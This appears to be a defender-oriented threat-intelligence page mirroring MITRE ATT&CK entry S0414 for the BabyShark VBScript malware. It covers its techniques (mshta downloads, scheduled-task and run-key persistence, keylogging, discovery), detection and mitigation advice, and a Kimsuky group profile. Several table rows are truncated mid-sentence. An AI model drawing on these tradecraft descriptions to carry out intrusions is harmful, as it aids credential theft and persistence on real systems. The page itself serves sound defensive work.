S0414: BabyShark
Analyst context for executives and security teams
BabyShark matters because it represents a Windows VBScript-based malware family with behaviors that can support reconnaissance, execution, persistence, credential collection, command-and-control preparation, and cleanup. For leaders, the practical question is not whether a product “detects BabyShark,” but whether the organization can see script execution, Windows shell activity, registry and scheduled task changes, discovery commands, file staging, encoded traffic, and deletion activity quickly enough to support containment and investigation.
Executive priority
Prioritize this as a readiness check for Windows endpoint visibility, script-control governance, identity risk, and incident response evidence quality. The ATT&CK relationships connect BabyShark to techniques that often determine whether an intrusion remains a single-host event or becomes a broader investigation: persistence through scheduled tasks or run keys, credential exposure through keylogging, discovery of users/systems/files, and external tool transfer. Executives should ask whether SOC and IR teams can prove collection and retention of the evidence needed to reconstruct those behaviors.
Technical view
BabyShark is documented as Microsoft Visual Basic script-based malware on Windows. ATT&CK relationships show use of Visual Basic, Windows Command Shell, mshta, registry querying, scheduled tasks, registry run keys/startup folder, system/user/process/network/file discovery, ingress tool transfer, standard encoding, deobfuscation/decoding, keylogging, and file deletion. Detection engineering should validate behavior-based analytics around script interpreters and trusted Windows utilities launching suspicious child processes, creating persistence, performing clustered discovery, staging files, decoding content, and removing artifacts. Because MITRE does not provide an official detection section for this object, coverage should be validated against the related techniques rather than the malware name alone.
Likely telemetry
- Windows endpoint process creation events including command-line arguments and parent-child process relationships
- Script execution telemetry for VBScript/Visual Basic activity
- Windows Registry auditing for queried keys and persistence locations such as run keys
- Scheduled task creation, modification, and execution events
- File creation, modification, transfer/staging, and deletion events
Detection direction
- Validate detections for suspicious use of Visual Basic/VBScript, mshta.exe, and cmd.exe, especially when chained together or launched from unusual parent processes.
- Correlate discovery behaviors: registry queries, user discovery, process discovery, system information discovery, network configuration discovery, and file/directory enumeration occurring in close sequence.
- Monitor persistence changes via scheduled tasks and registry run keys/startup folders, with allowlists for approved administrative software to reduce false positives.
- Look for tool transfer followed by execution or decoding/deobfuscation activity; standard encoding alone is common, so detection should depend on context and process lineage.
- Treat file deletion after execution or staging as an investigation signal, especially when paired with script execution or persistence changes.
Mitigation priorities
- Harden Windows script execution paths and restrict unnecessary use of VBScript, mshta.exe, and command shell where business processes allow.
- Control persistence mechanisms by monitoring and limiting creation of scheduled tasks and registry run key/startup folder entries.
- Ensure endpoint logging, EDR, and Windows audit policies capture process, registry, scheduled task, file, and network evidence with sufficient retention for IR.
- Apply least privilege so user-context persistence and discovery have reduced operational reach.
- Strengthen credential protection and response playbooks for suspected keylogging or credential collection.
Analyst notes and limits
The supplied object identifies BabyShark as a Windows VBScript-based malware family and provides technique relationships that are useful for defensive validation. The strongest defensive value is mapping those relationships into control tests and telemetry checks. The relationship to Kimsuky and descriptions referencing North Korean campaigns should be handled as threat-intelligence context, not as standalone attribution for any local event.
MITRE provides no official detection text for this object, no object-level tactics, and no supplied procedure-level details beyond the listed relationships and references. This take therefore avoids claims about active exploitation, guaranteed detection, specific indicators, or customer exposure. Local endpoint, identity, and network evidence is required to determine actual activity and attribution.
BabyShark
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1053.005 | Scheduled Task Sub-technique | BabyShark has used scheduled tasks to maintain persistence.CitationCrowdstrike GTR2020 Mar 2020 |
| Enterprise | T1033 | System Owner/User Discovery | BabyShark has executed the |
| Enterprise | T1105 | Ingress Tool Transfer | BabyShark has downloaded additional files from the C2.CitationUnit42 BabyShark Apr 2019CitationCISA AA20-301A Kimsuky |
| Enterprise | T1012 | Query Registry | BabyShark has executed the |
| Enterprise | T1218.005 | Mshta Sub-technique | BabyShark has used mshta.exe to download and execute applications from a remote server.CitationCISA AA20-301A Kimsuky |
| Enterprise | T1056.001 | Keylogging Sub-technique | BabyShark has a PowerShell-based remote administration ability that can implement a PowerShell or C# based keylogger.CitationUnit42 BabyShark Apr 2019 |
| Enterprise | T1057 | Process Discovery | BabyShark has executed the |
| Enterprise | T1059.005 | Visual Basic Sub-technique | BabyShark can execute additional VisualBasic content.CitationMandiant APT43 March 2024 |
| Enterprise | T1083 | File and Directory Discovery | BabyShark has used |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | BabyShark has the ability to decode downloaded files prior to execution.CitationCISA AA20-301A Kimsuky |
| Enterprise | T1082 | System Information Discovery | BabyShark has executed the |
| Enterprise | T1132.001 | Standard Encoding Sub-technique | |
| Enterprise | T1070.004 | File Deletion Sub-technique | BabyShark has cleaned up all files associated with the secondary payload execution.CitationUnit42 BabyShark Apr 2019 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | BabyShark has added a Registry key to ensure all future macros are enabled for Microsoft Word and Excel as well as for additional persistence.CitationUnit42 BabyShark Feb 2019CitationCISA AA20-301A Kimsuky |
| Enterprise | T1016 | System Network Configuration Discovery | BabyShark has executed the |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | BabyShark has used cmd.exe to execute commands.CitationUnit42 BabyShark Feb 2019 |
Groups, software, and campaigns
G0094: Kimsuky
Kimsuky is a Democratic People's Republic of Korea (DPRK)-based cyber espionage group that has been active since at least 2012. The group initially targeted South Korean government agencies, think tanks, and subject-matter experts in various fields. Its operations expanded to include the United Nations and organizations in the government, education, business services, and manufacturing sectors across the United States, Japan, Russia, and Europe. Kimsuky has focused collection on foreign policy and national security issues tied to the Korean Peninsula, nuclear policy, and sanctions. Kimsuky operations have overlapped with those of other North Korean state-sponsored cyber espionage actors as a result of ad hoc collaborations or other limited resource sharing.[1][2][3][4][5][6]
Kimsuky was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).[7][8][9] In 2023, Kimsuky was observed using commercial large language models (LLMs) to assist with vulnerability research, scripting, social engineering and reconnaissance.[10]
DPRK threat actor cluster boundaries overlap in open source reporting, with some security researchers consolidating all attributed North Korean state-sponsored cyber activity under Lazarus Group, rather than tracking operationally distinct subgroups.
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 2.0 | Current bundle | 180e07105da0… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Unit42 BabyShark Feb 2019
Unit 42. (2019, February 22). New BabyShark Malware Targets U.S. National Security Think Tanks. Retrieved October 7, 2019.
Open source URL -
[2]
BabyShark
(Citation: Unit42 BabyShark Feb 2019)(Citation: Unit42 BabyShark Apr 2019)
-
[3]
LATEOP
(Citation: Mandiant APT43 March 2024)
-
[4]
Mandiant APT43 March 2024
Mandiant. (2024, March 14). APT43: North Korean Group Uses Cybercrime to Fund Espionage Operations. Retrieved May 3, 2024.
Open source URL -
[5]
Unit42 BabyShark Apr 2019
Lim, M.. (2019, April 26). BabyShark Malware Part Two – Attacks Continue Using KimJongRAT and PCRat . Retrieved October 7, 2019.
Open source URL -
[6]
mitre-attack S0414Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.